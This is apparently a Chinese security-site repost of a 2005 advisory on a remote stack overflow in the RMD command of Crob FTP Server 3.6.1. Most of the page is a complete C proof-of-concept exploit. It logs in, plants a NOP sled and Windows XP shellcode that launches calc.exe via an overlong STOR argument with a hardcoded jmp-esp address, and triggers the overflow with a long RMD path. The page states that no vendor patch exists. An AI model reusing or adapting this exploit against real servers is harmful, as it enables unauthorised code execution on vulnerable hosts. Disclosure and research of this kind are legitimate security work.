首页 网络安全 安全学院 查看内容

Crob FTP Server远程RMD命令栈溢出漏洞

2005-6-7 04:48 641 0

摘要: 受影响系统: Crob Crob FTP Server 3.6.1描述: BUGTRAQ  ID: 13847Crob Ftp Server是一款简单易用的FTP服务程...
关键词: nbsp sock buf printf char recv tmp strlen Server return

受影响系统: Crob Crob FTP Server 3.6.1描述: BUGTRAQ  ID: 13847Crob Ftp Server是一款简单易用的FTP服务程序。Crob FTP Server在处理客户端请求时存在缓冲区溢出漏洞。如果攻击者能够向任意FTP命令(例如STOR)提供超长参数然后以很长的参数调用RMD命令的话,就可以触发栈溢出。成功利用这个漏洞的攻击者可在服务器上以执行代码。<*来源:Leon Juranic ([email protected])    链接:http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-06*>测试方法: 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!/** CrobFTP remote stack overflow PoC * ---------------------------------* Tested on Crob FTP Server 3.6.1, Windows XP* * Coded by Leon Juranic <[email protected]>* LSS Security / http://security.lss.hr**/#include <stdio.h>#include <windows.h>#include <time.h>#pragma comment (lib,"ws2_32")char *fzz_recv (int sock){    fd_set fds;    struct timeval tv;    static char buf[10000];    char *ptr=buf;    int n;    tv.tv_sec = 5;    tv.tv_usec = 0;    FD_ZERO(&fds);    FD_SET(sock,&fds);    if (select(NULL,&fds,NULL,NULL,&tv) != 0) {        if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);        buf[n-1] = '\0';        printf ("RECV: %s\n",buf);        return buf;    }    else {        return NULL;    }    }    int login (int sock, char *user, char *pass){    char buf[1024], *bla;    bla=fzz_recv(sock);    printf ("recv: %s\n",bla);    sprintf (buf,"USER %s\r\n",user);    send (sock,buf,strlen(buf),0);    bla=fzz_recv(sock);    printf ("recv: %s\n",bla);    sprintf (buf,"PASS %s\r\n",pass);    send (sock,buf,strlen(buf),0);    bla=fzz_recv(sock);    printf ("recv: %s\n",bla);    if (strcmp("230",bla) != NULL)        return 0;    else return -1;    return 0;}void lame_sploit (char *pack, char *user, char *pass){    WORD wVersionRequested;    WSADATA wsaData;    int sock, err,x;    struct sockaddr_in sin;    char buf[2000],tmp[1000];        char *shell=                // 5 min. XP SP1 shellcode        "\x33\xc0"                // xor eax,eax        "\x50"                    // push eax (\0)        "\x68\x2e\x65\x78\x65"  // push '.exe'        "\x68\x63\x61\x6c\x63"  // push 'calc'        "\x54"                    // push esp        "\xba\x44\x80\xc2\x77"  // mov  edx, 77c28044        "\xff\xd2";                // call edx  (system)    wVersionRequested = MAKEWORD( 2, 2 );    err = WSAStartup( wVersionRequested, &wsaData );    if ( err != 0 ) {        printf ("ERROR: Sorry, cannot create socket!!!\n");        ExitProcess(-1);    }    sock=socket(AF_INET,SOCK_STREAM,0);        sin.sin_family=AF_INET;    sin.sin_addr.s_addr = inet_addr(pack);    sin.sin_port = htons(21);        if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {        printf ("CONNECT :(((\n");        ExitProcess(-1);    }    if (login(sock,user,pass) == -1)    {        printf ("ERROR: Cannot login to FTP server, sorry!!!\n");        exit(-1);    }        memset(tmp,0,sizeof(tmp));    memset (tmp,0x90,180);    memcpy (&tmp[80],shell,strlen(shell));    *(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'    *(long*)&tmp[166] = 0x74ec8390; //          sub esp,0x74    *(long*)&tmp[170] = 0x9090e4ff; //          jmp esp    _snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);    printf ("DEBUG: %.30s %d\n",buf,strlen(buf));    send (sock,buf,strlen(buf),0);    printf ("%s\n",fzz_recv(sock));    strcpy(buf,"RMD ");    for (x=0;x<276;x++)        strcat (buf,".../");    strcat(buf,"\r\n");    printf ("Sending exploit strings\n");    send (sock,buf,strlen(buf),0);    printf ("recv: %s\n",fzz_recv(sock));}main (int argc, char **argv){    printf ("CrobFTP Stack overflow PoC \n"            "Coded by Leon Juranic <[email protected]>\n"            "LSS Security / http://security.lss.hr/\n");    if (argc < 4 ) {        printf ("\nusage: %s <target_IP> <user> <pass>\n",argv[0]);        exit(-1);    }    lame_sploit(argv[1],argv[2],argv[3]);}建议: 厂商补丁:Crob----目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.crob.net/studio/ftpserver/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部